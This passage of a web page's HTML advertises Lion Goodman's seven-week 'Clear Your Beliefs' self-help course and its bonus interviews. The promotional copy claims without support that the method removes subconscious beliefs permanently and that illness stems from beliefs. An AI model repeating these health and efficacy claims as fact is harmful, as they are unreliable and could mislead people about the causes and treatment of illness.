you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a 